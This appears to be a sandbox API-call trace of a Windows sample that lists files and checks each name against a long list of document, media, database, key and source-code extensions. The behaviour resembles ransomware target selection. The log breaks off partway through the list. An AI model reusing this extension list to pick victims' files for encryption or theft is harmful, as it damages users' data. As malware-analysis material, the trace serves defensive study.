	[0043.591] FindNextFileW (in: hFindFile=0xb430308, lpFindFileData=0xaa5f58c | out: lpFindFileData=0xaa5f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0043.595] FindNextFileW (in: hFindFile=0xb430308, lpFindFileData=0xaa5f58c | out: lpFindFileData=0xaa5f58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe421d16, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xe874c0b, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xe421d16, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x7e800, dwReserved0=0x0, dwReserved1=0x0, cFileName="msoeres.dll.mui", cAlternateFileName="")) returned 1
	[0043.596] lstrlenW (lpString="msoeres.dll.mui") returned 15
	[0043.596] lstrlenW (lpString=".1cd") returned 4
	[0043.596] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0043.596] lstrlenW (lpString=".3ds") returned 4
	[0043.596] lstrcmpiW (lpString1=".3ds", lpString2=".mui") returned -1
	[0043.596] lstrlenW (lpString=".3fr") returned 4
	[0043.596] lstrcmpiW (lpString1=".3fr", lpString2=".mui") returned -1
	[0043.596] lstrlenW (lpString=".3g2") returned 4
	[0043.596] lstrcmpiW (lpString1=".3g2", lpString2=".mui") returned -1
	[0043.596] lstrlenW (lpString=".3gp") returned 4
	[0043.596] lstrcmpiW (lpString1=".3gp", lpString2=".mui") returned -1
	[0043.596] lstrlenW (lpString=".7z") returned 3
	[0043.596] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0043.596] lstrlenW (lpString=".accda") returned 6
	[0043.596] lstrcmpiW (lpString1=".accda", lpString2="ll.mui") returned -1
	[0043.596] lstrlenW (lpString=".accdb") returned 6
	[0043.596] lstrcmpiW (lpString1=".accdb", lpString2="ll.mui") returned -1
	[0043.596] lstrlenW (lpString=".accdc") returned 6
	[0043.596] lstrcmpiW (lpString1=".accdc", lpString2="ll.mui") returned -1
	[0043.596] lstrlenW (lpString=".accde") returned 6
	[0043.596] lstrcmpiW (lpString1=".accde", lpString2="ll.mui") returned -1
	[0043.596] lstrlenW (lpString=".accdt") returned 6
	[0043.596] lstrcmpiW (lpString1=".accdt", lpString2="ll.mui") returned -1
	[0043.596] lstrlenW (lpString=".accdw") returned 6
	[0043.596] lstrcmpiW (lpString1=".accdw", lpString2="ll.mui") returned -1
	[0043.596] lstrlenW (lpString=".adb") returned 4
	[0043.596] lstrcmpiW (lpString1=".adb", lpString2=".mui") returned -1
	[0043.596] lstrlenW (lpString=".adp") returned 4
	[0043.596] lstrcmpiW (lpString1=".adp", lpString2=".mui") returned -1
	[0043.596] lstrlenW (lpString=".ai") returned 3
	[0043.596] lstrcmpiW (lpString1=".ai", lpString2="mui") returned -1
	[0043.597] lstrlenW (lpString=".ai3") returned 4
	[0043.597] lstrcmpiW (lpString1=".ai3", lpString2=".mui") returned -1
	[0043.597] lstrlenW (lpString=".ai4") returned 4
	[0043.597] lstrcmpiW (lpString1=".ai4", lpString2=".mui") returned -1
	[0043.597] lstrlenW (lpString=".ai5") returned 4
	[0043.597] lstrcmpiW (lpString1=".ai5", lpString2=".mui") returned -1
	[0043.597] lstrlenW (lpString=".ai6") returned 4
	[0043.597] lstrcmpiW (lpString1=".ai6", lpString2=".mui") returned -1
	[0043.597] lstrlenW (lpString=".ai7") returned 4
	[0043.597] lstrcmpiW (lpString1=".ai7", lpString2=".mui") returned -1
	[0043.597] lstrlenW (lpString=".ai8") returned 4
	[0043.597] lstrcmpiW (lpString1=".ai8", lpString2=".mui") returned -1
	[0043.597] lstrlenW (lpString=".anim") returned 5
	[0043.597] lstrcmpiW (lpString1=".anim", lpString2="l.mui") returned -1
	[0043.597] lstrlenW (lpString=".arw") returned 4
	[0043.597] lstrcmpiW (lpString1=".arw", lpString2=".mui") returned -1
	[0043.597] lstrlenW (lpString=".as") returned 3
	[0043.597] lstrcmpiW (lpString1=".as", lpString2="mui") returned -1
	[0043.597] lstrlenW (lpString=".asa") returned 4
	[0043.597] lstrcmpiW (lpString1=".asa", lpString2=".mui") returned -1
	[0043.597] lstrlenW (lpString=".asc") returned 4
	[0043.597] lstrcmpiW (lpString1=".asc", lpString2=".mui") returned -1
	[0043.597] lstrlenW (lpString=".ascx") returned 5
	[0043.597] lstrcmpiW (lpString1=".ascx", lpString2="l.mui") returned -1
	[0043.597] lstrlenW (lpString=".asm") returned 4
	[0043.597] lstrcmpiW (lpString1=".asm", lpString2=".mui") returned -1
	[0043.597] lstrlenW (lpString=".asmx") returned 5
	[0043.597] lstrcmpiW (lpString1=".asmx", lpString2="l.mui") returned -1
	[0043.597] lstrlenW (lpString=".asp") returned 4
	[0043.597] lstrcmpiW (lpString1=".asp", lpString2=".mui") returned -1
	[0043.597] lstrlenW (lpString=".aspx") returned 5
	[0043.597] lstrcmpiW (lpString1=".aspx", lpString2="l.mui") returned -1
	[0043.597] lstrlenW (lpString=".asr") returned 4
	[0043.597] lstrcmpiW (lpString1=".asr", lpString2=".mui") returned -1
	[0043.597] lstrlenW (lpString=".asx") returned 4
	[0043.598] lstrcmpiW (lpString1=".asx", lpString2=".mui") returned -1
	[0043.598] lstrlenW (lpString=".avi") returned 4
	[0043.598] lstrcmpiW (lpString1=".avi", lpString2=".mui") returned -1
	[0043.598] lstrlenW (lpString=".avs") returned 4
	[0043.598] lstrcmpiW (lpString1=".avs", lpString2=".mui") returned -1
	[0043.598] lstrlenW (lpString=".backup") returned 7
	[0043.598] lstrcmpiW (lpString1=".backup", lpString2="dll.mui") returned -1
	[0043.598] lstrlenW (lpString=".bak") returned 4
	[0043.598] lstrcmpiW (lpString1=".bak", lpString2=".mui") returned -1
	[0043.598] lstrlenW (lpString=".bay") returned 4
	[0043.598] lstrcmpiW (lpString1=".bay", lpString2=".mui") returned -1
	[0043.598] lstrlenW (lpString=".bd") returned 3
	[0043.598] lstrcmpiW (lpString1=".bd", lpString2="mui") returned -1
	[0043.598] lstrlenW (lpString=".bin") returned 4
	[0043.598] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1
	[0043.598] lstrlenW (lpString=".bmp") returned 4
	[0043.598] lstrcmpiW (lpString1=".bmp", lpString2=".mui") returned -1
	[0043.598] lstrlenW (lpString=".bz2") returned 4
	[0043.598] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0043.598] lstrlenW (lpString=".c") returned 2
	[0043.598] lstrcmpiW (lpString1=".c", lpString2="ui") returned -1
	[0043.598] lstrlenW (lpString=".cdr") returned 4
	[0043.598] lstrcmpiW (lpString1=".cdr", lpString2=".mui") returned -1
	[0043.598] lstrlenW (lpString=".cer") returned 4
	[0043.598] lstrcmpiW (lpString1=".cer", lpString2=".mui") returned -1
	[0043.598] lstrlenW (lpString=".cf") returned 3
	[0043.598] lstrcmpiW (lpString1=".cf", lpString2="mui") returned -1
	[0043.598] lstrlenW (lpString=".cfc") returned 4
	[0043.598] lstrcmpiW (lpString1=".cfc", lpString2=".mui") returned -1
	[0043.598] lstrlenW (lpString=".cfm") returned 4
	[0043.598] lstrcmpiW (lpString1=".cfm", lpString2=".mui") returned -1
	[0043.598] lstrlenW (lpString=".cfml") returned 5
	[0043.598] lstrcmpiW (lpString1=".cfml", lpString2="l.mui") returned -1
	[0043.598] lstrlenW (lpString=".cfu") returned 4
	[0043.598] lstrcmpiW (lpString1=".cfu", lpString2=".mui") returned -1
	[0043.599] lstrlenW (lpString=".chm") returned 4
	[0043.599] lstrcmpiW (lpString1=".chm", lpString2=".mui") returned -1
	[0043.599] lstrlenW (lpString=".cin") returned 4
	[0043.599] lstrcmpiW (lpString1=".cin", lpString2=".mui") returned -1
	[0043.599] lstrlenW (lpString=".class") returned 6
	[0043.599] lstrcmpiW (lpString1=".class", lpString2="ll.mui") returned -1
	[0043.599] lstrlenW (lpString=".clx") returned 4
	[0043.599] lstrcmpiW (lpString1=".clx", lpString2=".mui") returned -1
	[0043.599] lstrlenW (lpString=".config") returned 7
	[0043.599] lstrcmpiW (lpString1=".config", lpString2="dll.mui") returned -1
	[0043.599] lstrlenW (lpString=".cpp") returned 4
	[0043.599] lstrcmpiW (lpString1=".cpp", lpString2=".mui") returned -1
	[0043.599] lstrlenW (lpString=".cr2") returned 4
	[0043.600] lstrcmpiW (lpString1=".cr2", lpString2=".mui") returned -1
	[0043.600] lstrlenW (lpString=".crt") returned 4
	[0043.600] lstrcmpiW (lpString1=".crt", lpString2=".mui") returned -1
	[0043.600] lstrlenW (lpString=".crw") returned 4
	[0043.600] lstrcmpiW (lpString1=".crw", lpString2=".mui") returned -1
	[0043.600] lstrlenW (lpString=".cs") returned 3
	[0043.600] lstrcmpiW (lpString1=".cs", lpString2="mui") returned -1
	[0043.600] lstrlenW (lpString=".css") returned 4
	[0043.600] lstrcmpiW (lpString1=".css", lpString2=".mui") returned -1
	[0043.600] lstrlenW (lpString=".csv") returned 4
	[0043.600] lstrcmpiW (lpString1=".csv", lpString2=".mui") returned -1
	[0043.600] lstrlenW (lpString=".cub") returned 4
	[0043.600] lstrcmpiW (lpString1=".cub", lpString2=".mui") returned -1
	[0043.600] lstrlenW (lpString=".dae") returned 4
	[0043.600] lstrcmpiW (lpString1=".dae", lpString2=".mui") returned -1
	[0043.600] lstrlenW (lpString=".dat") returned 4
	[0043.600] lstrcmpiW (lpString1=".dat", lpString2=".mui") returned -1
	[0043.600] lstrlenW (lpString=".db") returned 3
	[0043.600] lstrcmpiW (lpString1=".db", lpString2="mui") returned -1
	[0043.600] lstrlenW (lpString=".dbf") returned 4
	[0043.600] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0043.600] lstrlenW (lpString=".dbx") returned 4
	[0043.600] lstrcmpiW (lpString1=".dbx", lpString2=".mui") returned -1
	[0043.600] lstrlenW (lpString=".dc3") returned 4
	[0043.600] lstrcmpiW (lpString1=".dc3", lpString2=".mui") returned -1
	[0043.600] lstrlenW (lpString=".dcm") returned 4
	[0043.600] lstrcmpiW (lpString1=".dcm", lpString2=".mui") returned -1
	[0043.600] lstrlenW (lpString=".dcr") returned 4
	[0043.600] lstrcmpiW (lpString1=".dcr", lpString2=".mui") returned -1
	[0043.600] lstrlenW (lpString=".der") returned 4
	[0043.600] lstrcmpiW (lpString1=".der", lpString2=".mui") returned -1
	[0043.600] lstrlenW (lpString=".dib") returned 4
	[0043.600] lstrcmpiW (lpString1=".dib", lpString2=".mui") returned -1
	[0043.600] lstrlenW (lpString=".dic") returned 4
	[0043.600] lstrcmpiW (lpString1=".dic", lpString2=".mui") returned -1
	[0043.600] lstrlenW (lpString=".dif") returned 4
	[0043.601] lstrcmpiW (lpString1=".dif", lpString2=".mui") returned -1
	[0043.601] lstrlenW (lpString=".divx") returned 5
	[0043.601] lstrcmpiW (lpString1=".divx", lpString2="l.mui") returned -1
	[0043.601] lstrlenW (lpString=".djvu") returned 5
	[0043.601] lstrcmpiW (lpString1=".djvu", lpString2="l.mui") returned -1
	[0043.601] lstrlenW (lpString=".dng") returned 4
	[0043.601] lstrcmpiW (lpString1=".dng", lpString2=".mui") returned -1
	[0043.601] lstrlenW (lpString=".doc") returned 4
	[0043.601] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0043.601] lstrlenW (lpString=".docm") returned 5
	[0043.601] lstrcmpiW (lpString1=".docm", lpString2="l.mui") returned -1
	[0043.601] lstrlenW (lpString=".docx") returned 5
	[0043.601] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1
	[0043.601] lstrlenW (lpString=".dot") returned 4
	[0043.601] lstrcmpiW (lpString1=".dot", lpString2=".mui") returned -1
	[0043.601] lstrlenW (lpString=".dotm") returned 5
	[0043.601] lstrcmpiW (lpString1=".dotm", lpString2="l.mui") returned -1
	[0043.601] lstrlenW (lpString=".dotx") returned 5
	[0043.601] lstrcmpiW (lpString1=".dotx", lpString2="l.mui") returned -1
	[0043.601] lstrlenW (lpString=".dpx") returned 4
	[0043.601] lstrcmpiW (lpString1=".dpx", lpString2=".mui") returned -1
	[0043.601] lstrlenW (lpString=".dqy") returned 4
	[0043.601] lstrcmpiW (lpString1=".dqy", lpString2=".mui") returned -1
	[0043.601] lstrlenW (lpString=".dsn") returned 4
	[0043.601] lstrcmpiW (lpString1=".dsn", lpString2=".mui") returned -1
	[0043.601] lstrlenW (lpString=".dt") returned 3
	[0043.601] lstrcmpiW (lpString1=".dt", lpString2="mui") returned -1
	[0043.601] lstrlenW (lpString=".dtd") returned 4
	[0043.601] lstrcmpiW (lpString1=".dtd", lpString2=".mui") returned -1
	[0043.601] lstrlenW (lpString=".dwg") returned 4
	[0043.601] lstrcmpiW (lpString1=".dwg", lpString2=".mui") returned -1
	[0043.601] lstrlenW (lpString=".dwt") returned 4
	[0043.601] lstrcmpiW (lpString1=".dwt", lpString2=".mui") returned -1
	[0043.601] lstrlenW (lpString=".dx") returned 3
	[0043.601] lstrcmpiW (lpString1=".dx", lpString2="mui") returned -1
	[0043.602] lstrlenW (lpString=".dxf") returned 4
	[0043.602] lstrcmpiW (lpString1=".dxf", lpString2=".mui") returned -1
	[0043.602] lstrlenW (lpString=".edml") returned 5
	[0043.602] lstrcmpiW (lpString1=".edml", lpString2="l.mui") returned -1
	[0043.602] lstrlenW (lpString=".efd") returned 4
	[0043.602] lstrcmpiW (lpString1=".efd", lpString2=".mui") returned -1
	[0043.602] lstrlenW (lpString=".elf") returned 4
	[0043.602] lstrcmpiW (lpString1=".elf", lpString2=".mui") returned -1
	[0043.602] lstrlenW (lpString=".emf") returned 4
	[0043.602] lstrcmpiW (lpString1=".emf", lpString2=".mui") returned -1
	[0043.602] lstrlenW (lpString=".emz") returned 4
	[0043.602] lstrcmpiW (lpString1=".emz", lpString2=".mui") returned -1
	[0043.602] lstrlenW (lpString=".epf") returned 4
	[0043.602] lstrcmpiW (lpString1=".epf", lpString2=".mui") returned -1
	[0043.602] lstrlenW (lpString=".eps") returned 4
	[0043.602] lstrcmpiW (lpString1=".eps", lpString2=".mui") returned -1
	[0043.602] lstrlenW (lpString=".epsf") returned 5
	[0043.602] lstrcmpiW (lpString1=".epsf", lpString2="l.mui") returned -1
	[0043.602] lstrlenW (lpString=".epsp") returned 5
	[0043.602] lstrcmpiW (lpString1=".epsp", lpString2="l.mui") returned -1
	[0043.602] lstrlenW (lpString=".erf") returned 4
	[0043.602] lstrcmpiW (lpString1=".erf", lpString2=".mui") returned -1
	[0043.602] lstrlenW (lpString=".exr") returned 4
	[0043.602] lstrcmpiW (lpString1=".exr", lpString2=".mui") returned -1
	[0043.602] lstrlenW (lpString=".f4v") returned 4
	[0043.602] lstrcmpiW (lpString1=".f4v", lpString2=".mui") returned -1
	[0043.602] lstrlenW (lpString=".fido") returned 5
	[0043.602] lstrcmpiW (lpString1=".fido", lpString2="l.mui") returned -1
	[0043.602] lstrlenW (lpString=".flm") returned 4
	[0043.602] lstrcmpiW (lpString1=".flm", lpString2=".mui") returned -1
	[0043.602] lstrlenW (lpString=".flv") returned 4
	[0043.602] lstrcmpiW (lpString1=".flv", lpString2=".mui") returned -1
	[0043.602] lstrlenW (lpString=".frm") returned 4
	[0043.602] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1
	[0043.602] lstrlenW (lpString=".fxg") returned 4
	[0043.602] lstrcmpiW (lpString1=".fxg", lpString2=".mui") returned -1
	[0043.603] lstrlenW (lpString=".geo") returned 4
	[0043.603] lstrcmpiW (lpString1=".geo", lpString2=".mui") returned -1
	[0043.603] lstrlenW (lpString=".gif") returned 4
	[0043.603] lstrcmpiW (lpString1=".gif", lpString2=".mui") returned -1
	[0043.603] lstrlenW (lpString=".grs") returned 4
	[0043.603] lstrcmpiW (lpString1=".grs", lpString2=".mui") returned -1
	[0043.603] lstrlenW (lpString=".gz") returned 3
	[0043.603] lstrcmpiW (lpString1=".gz", lpString2="mui") returned -1
	[0043.603] lstrlenW (lpString=".h") returned 2
	[0043.603] lstrcmpiW (lpString1=".h", lpString2="ui") returned -1
	[0043.603] lstrlenW (lpString=".hdr") returned 4
	[0043.603] lstrcmpiW (lpString1=".hdr", lpString2=".mui") returned -1
	[0043.603] lstrlenW (lpString=".hpp") returned 4
	[0043.603] lstrcmpiW (lpString1=".hpp", lpString2=".mui") returned -1
	[0043.603] lstrlenW (lpString=".hta") returned 4
	[0043.603] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1
	[0043.603] lstrlenW (lpString=".htc") returned 4
	[0043.603] lstrcmpiW (lpString1=".htc", lpString2=".mui") returned -1
	[0043.603] lstrlenW (lpString=".htm") returned 4
	[0043.603] lstrcmpiW (lpString1=".htm", lpString2=".mui") returned -1
	[0043.603] lstrlenW (lpString=".html") returned 5
	[0043.603] lstrcmpiW (lpString1=".html", lpString2="l.mui") returned -1
	[0043.603] lstrlenW (lpString=".icb") returned 4
	[0043.603] lstrcmpiW (lpString1=".icb", lpString2=".mui") returned -1
	[0043.603] lstrlenW (lpString=".ics") returned 4
	[0043.603] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1
	[0043.603] lstrlenW (lpString=".iff") returned 4
	[0043.603] lstrcmpiW (lpString1=".iff", lpString2=".mui") returned -1
	[0043.603] lstrlenW (lpString=".inc") returned 4
	[0043.603] lstrcmpiW (lpString1=".inc", lpString2=".mui") returned -1
	[0043.603] lstrlenW (lpString=".indd") returned 5
	[0043.603] lstrcmpiW (lpString1=".indd", lpString2="l.mui") returned -1
	[0043.603] lstrlenW (lpString=".ini") returned 4
	[0043.603] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1
	[0043.603] lstrlenW (lpString=".iqy") returned 4
	[0043.603] lstrcmpiW (lpString1=".iqy", lpString2=".mui") returned -1
	[0043.604] lstrlenW (lpString=".j2c") returned 4
	[0043.604] lstrcmpiW (lpString1=".j2c", lpString2=".mui") returned -1
	[0043.604] lstrlenW (lpString=".j2k") returned 4
	[0043.604] lstrcmpiW (lpString1=".j2k", lpString2=".mui") returned -1
	[0043.604] lstrlenW (lpString=".java") returned 5
	[0043.604] lstrcmpiW (lpString1=".java", lpString2="l.mui") returned -1
	[0043.604] lstrlenW (lpString=".jp2") returned 4
	[0043.604] lstrcmpiW (lpString1=".jp2", lpString2=".mui") returned -1
	[0043.604] lstrlenW (lpString=".jpc") returned 4
	[0043.604] lstrcmpiW (lpString1=".jpc", lpString2=".mui") returned -1
	[0043.604] lstrlenW (lpString=".jpe") returned 4
	[0043.604] lstrcmpiW (lpString1=".jpe", lpString2=".mui") returned -1
	[0043.604] lstrlenW (lpString=".jpeg") returned 5
	[0043.604] lstrcmpiW (lpString1=".jpeg", lpString2="l.mui") returned -1
	[0043.604] lstrlenW (lpString=".jpf") returned 4
	[0043.604] lstrcmpiW (lpString1=".jpf", lpString2=".mui") returned -1
	[0043.604] lstrlenW (lpString=".jpg") returned 4
	[0043.604] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0043.604] lstrlenW (lpString=".jpx") returned 4
	[0043.604] lstrcmpiW (lpString1=".jpx", lpString2=".mui") returned -1
	[0043.604] lstrlenW (lpString=".js") returned 3
	[0043.604] lstrcmpiW (lpString1=".js", lpString2="mui") returned -1
	[0043.604] lstrlenW (lpString=".jsf") returned 4
	[0043.604] lstrcmpiW (lpString1=".jsf", lpString2=".mui") returned -1
	[0043.604] lstrlenW (lpString=".json") returned 5
	[0043.604] lstrcmpiW (lpString1=".json", lpString2="l.mui") returned -1
	[0043.604] lstrlenW (lpString=".jsp") returned 4
	[0043.604] lstrcmpiW (lpString1=".jsp", lpString2=".mui") returned -1
	[0043.604] lstrlenW (lpString=".kdc") returned 4
	[0043.604] lstrcmpiW (lpString1=".kdc", lpString2=".mui") returned -1
	[0043.604] lstrlenW (lpString=".kmz") returned 4
	[0043.604] lstrcmpiW (lpString1=".kmz", lpString2=".mui") returned -1
	[0043.604] lstrlenW (lpString=".kwm") returned 4
	[0043.604] lstrcmpiW (lpString1=".kwm", lpString2=".mui") returned -1
	[0043.604] lstrlenW (lpString=".lasso") returned 6
	[0043.604] lstrcmpiW (lpString1=".lasso", lpString2="ll.mui") returned -1
	[0043.605] lstrlenW (lpString=".lbi") returned 4
	[0043.605] lstrcmpiW (lpString1=".lbi", lpString2=".mui") returned -1
	[0043.605] lstrlenW (lpString=".lgf") returned 4
	[0043.605] lstrcmpiW (lpString1=".lgf", lpString2=".mui") returned -1
	[0043.605] lstrlenW (lpString=".lgp") returned 4
	[0043.605] lstrcmpiW (lpString1=".lgp", lpString2=".mui") returned -1
	[0043.605] lstrlenW (lpString=".log") returned 4
	[0043.605] lstrcmpiW (lpString1=".log", lpString2=".mui") returned -1
	[0043.605] lstrlenW (lpString=".m1v") returned 4
	[0043.605] lstrcmpiW (lpString1=".m1v", lpString2=".mui") returned -1
	[0043.605] lstrlenW (lpString=".m4a") returned 4
	[0043.605] lstrcmpiW (lpString1=".m4a", lpString2=".mui") returned -1
	[0043.605] lstrlenW (lpString=".m4v") returned 4
	[0043.605] lstrcmpiW (lpString1=".m4v", lpString2=".mui") returned -1
	[0043.605] lstrlenW (lpString=".max") returned 4
	[0043.605] lstrcmpiW (lpString1=".max", lpString2=".mui") returned -1
	[0043.605] lstrlenW (lpString=".md") returned 3
	[0043.605] lstrcmpiW (lpString1=".md", lpString2="mui") returned -1
	[0043.605] lstrlenW (lpString=".mda") returned 4
	[0043.605] lstrcmpiW (lpString1=".mda", lpString2=".mui") returned -1
	[0043.605] lstrlenW (lpString=".mdb") returned 4
	[0043.605] lstrcmpiW (lpString1=".mdb", lpString2=".mui") returned -1
	[0043.605] lstrlenW (lpString=".mde") returned 4
	[0043.605] lstrcmpiW (lpString1=".mde", lpString2=".mui") returned -1
	[0043.605] lstrlenW (lpString=".mdf") returned 4
	[0043.605] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1
	[0043.605] lstrlenW (lpString=".mdw") returned 4
	[0043.605] lstrcmpiW (lpString1=".mdw", lpString2=".mui") returned -1
	[0043.605] lstrlenW (lpString=".mef") returned 4
	[0043.605] lstrcmpiW (lpString1=".mef", lpString2=".mui") returned -1
	[0043.605] lstrlenW (lpString=".mft") returned 4
	[0043.605] lstrcmpiW (lpString1=".mft", lpString2=".mui") returned -1
	[0043.605] lstrlenW (lpString=".mfw") returned 4
	[0043.605] lstrcmpiW (lpString1=".mfw", lpString2=".mui") returned -1
	[0043.605] lstrlenW (lpString=".mht") returned 4
	[0043.605] lstrcmpiW (lpString1=".mht", lpString2=".mui") returned -1
	[0043.606] lstrlenW (lpString=".mhtml") returned 6
	[0043.606] lstrcmpiW (lpString1=".mhtml", lpString2="ll.mui") returned -1
	[0043.606] lstrlenW (lpString=".mka") returned 4
	[0043.606] lstrcmpiW (lpString1=".mka", lpString2=".mui") returned -1
	[0043.606] lstrlenW (lpString=".mkidx") returned 6
	[0043.606] lstrcmpiW (lpString1=".mkidx", lpString2="ll.mui") returned -1
	[0043.606] lstrlenW (lpString=".mkv") returned 4
	[0043.606] lstrcmpiW (lpString1=".mkv", lpString2=".mui") returned -1
	[0043.606] lstrlenW (lpString=".mos") returned 4
	[0043.606] lstrcmpiW (lpString1=".mos", lpString2=".mui") returned -1
	[0043.606] lstrlenW (lpString=".mov") returned 4
	[0043.606] lstrcmpiW (lpString1=".mov", lpString2=".mui") returned -1
	[0043.606] lstrlenW (lpString=".mp3") returned 4
	[0043.606] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1
	[0043.606] lstrlenW (lpString=".mp4") returned 4
	[0043.606] lstrcmpiW (lpString1=".mp4", lpString2=".mui") returned -1
	[0043.606] lstrlenW (lpString=".mpeg") returned 5
	[0043.606] lstrcmpiW (lpString1=".mpeg", lpString2="l.mui") returned -1
	[0043.606] lstrlenW (lpString=".mpg") returned 4
	[0043.606] lstrcmpiW (lpString1=".mpg", lpString2=".mui") returned -1
	[0043.606] lstrlenW (lpString=".mpv") returned 4
	[0043.606] lstrcmpiW (lpString1=".mpv", lpString2=".mui") returned -1
	[0043.606] lstrlenW (lpString=".mrw") returned 4
	[0043.606] lstrcmpiW (lpString1=".mrw", lpString2=".mui") returned -1
	[0043.606] lstrlenW (lpString=".msg") returned 4
	[0043.606] lstrcmpiW (lpString1=".msg", lpString2=".mui") returned -1
	[0043.606] lstrlenW (lpString=".mxl") returned 4
	[0043.606] lstrcmpiW (lpString1=".mxl", lpString2=".mui") returned 1
	[0043.606] lstrlenW (lpString=".myd") returned 4
	[0043.606] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1
	[0043.606] lstrlenW (lpString=".myi") returned 4
	[0043.606] lstrcmpiW (lpString1=".myi", lpString2=".mui") returned 1
	[0043.606] lstrlenW (lpString=".nef") returned 4
	[0043.606] lstrcmpiW (lpString1=".nef", lpString2=".mui") returned 1
	[0043.606] lstrlenW (lpString=".nrw") returned 4
	[0043.606] lstrcmpiW (lpString1=".nrw", lpString2=".mui") returned 1
	[0043.607] lstrlenW (lpString=".obj") returned 4
	[0043.607] lstrcmpiW (lpString1=".obj", lpString2=".mui") returned 1
	[0043.607] lstrlenW (lpString=".odb") returned 4
	[0043.607] lstrcmpiW (lpString1=".odb", lpString2=".mui") returned 1
	[0043.607] lstrlenW (lpString=".odc") returned 4
	[0043.607] lstrcmpiW (lpString1=".odc", lpString2=".mui") returned 1
	[0043.607] lstrlenW (lpString=".odm") returned 4
	[0043.607] lstrcmpiW (lpString1=".odm", lpString2=".mui") returned 1
	[0043.607] lstrlenW (lpString=".odp") returned 4
	[0043.607] lstrcmpiW (lpString1=".odp", lpString2=".mui") returned 1
	[0043.607] lstrlenW (lpString=".ods") returned 4
	[0043.607] lstrcmpiW (lpString1=".ods", lpString2=".mui") returned 1
	[0043.607] lstrlenW (lpString=".oft") returned 4
	[0043.607] lstrcmpiW (lpString1=".oft", lpString2=".mui") returned 1
	[0043.607] lstrlenW (lpString=".one") returned 4
	[0043.607] lstrcmpiW (lpString1=".one", lpString2=".mui") returned 1
	[0043.607] lstrlenW (lpString=".onepkg") returned 7
	[0043.607] lstrcmpiW (lpString1=".onepkg", lpString2="dll.mui") returned -1
	[0043.607] lstrlenW (lpString=".onetoc2") returned 8
	[0043.607] lstrcmpiW (lpString1=".onetoc2", lpString2=".dll.mui") returned 1
	[0043.607] lstrlenW (lpString=".opt") returned 4
	[0043.607] lstrcmpiW (lpString1=".opt", lpString2=".mui") returned 1
	[0043.607] lstrlenW (lpString=".oqy") returned 4
	[0043.607] lstrcmpiW (lpString1=".oqy", lpString2=".mui") returned 1
	[0043.607] lstrlenW (lpString=".orf") returned 4
	[0043.607] lstrcmpiW (lpString1=".orf", lpString2=".mui") returned 1
	[0043.607] lstrlenW (lpString=".p12") returned 4
	[0043.607] lstrcmpiW (lpString1=".p12", lpString2=".mui") returned 1
	[0043.607] lstrlenW (lpString=".p7b") returned 4
	[0043.607] lstrcmpiW (lpString1=".p7b", lpString2=".mui") returned 1
	[0043.607] lstrlenW (lpString=".p7c") returned 4
	[0043.607] lstrcmpiW (lpString1=".p7c", lpString2=".mui") returned 1
	[0043.607] lstrlenW (lpString=".pam") returned 4
	[0043.607] lstrcmpiW (lpString1=".pam", lpString2=".mui") returned 1
	[0043.607] lstrlenW (lpString=".pbm") returned 4
	[0043.607] lstrcmpiW (lpString1=".pbm", lpString2=".mui") returned 1
	[0043.608] lstrlenW (lpString=".pct") returned 4
	[0043.608] lstrcmpiW (lpString1=".pct", lpString2=".mui") returned 1
	[0043.608] lstrlenW (lpString=".pcx") returned 4
	[0043.608] lstrcmpiW (lpString1=".pcx", lpString2=".mui") returned 1
	[0043.608] lstrlenW (lpString=".pdd") returned 4
	[0043.608] lstrcmpiW (lpString1=".pdd", lpString2=".mui") returned 1
	[0043.608] lstrlenW (lpString=".pdf") returned 4
	[0043.608] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0043.608] lstrlenW (lpString=".pdp") returned 4
	[0043.608] lstrcmpiW (lpString1=".pdp", lpString2=".mui") returned 1
	[0043.608] lstrlenW (lpString=".pef") returned 4
	[0043.608] lstrcmpiW (lpString1=".pef", lpString2=".mui") returned 1
	[0043.608] lstrlenW (lpString=".pem") returned 4
	[0043.608] lstrcmpiW (lpString1=".pem", lpString2=".mui") returned 1
	[0043.608] lstrlenW (lpString=".pff") returned 4
	[0043.608] lstrcmpiW (lpString1=".pff", lpString2=".mui") returned 1
	[0043.608] lstrlenW (lpString=".pfm") returned 4
	[0043.608] lstrcmpiW (lpString1=".pfm", lpString2=".mui") returned 1
	[0043.608] lstrlenW (lpString=".pfx") returned 4
	[0043.608] lstrcmpiW (lpString1=".pfx", lpString2=".mui") returned 1
	[0043.608] lstrlenW (lpString=".pgm") returned 4
	[0043.608] lstrcmpiW (lpString1=".pgm", lpString2=".mui") returned 1
	[0043.608] lstrlenW (lpString=".php") returned 4
	[0043.608] lstrcmpiW (lpString1=".php", lpString2=".mui") returned 1
	[0043.608] lstrlenW (lpString=".php3") returned 5
	[0043.608] lstrcmpiW (lpString1=".php3", lpString2="l.mui") returned -1
	[0043.608] lstrlenW (lpString=".php4") returned 5
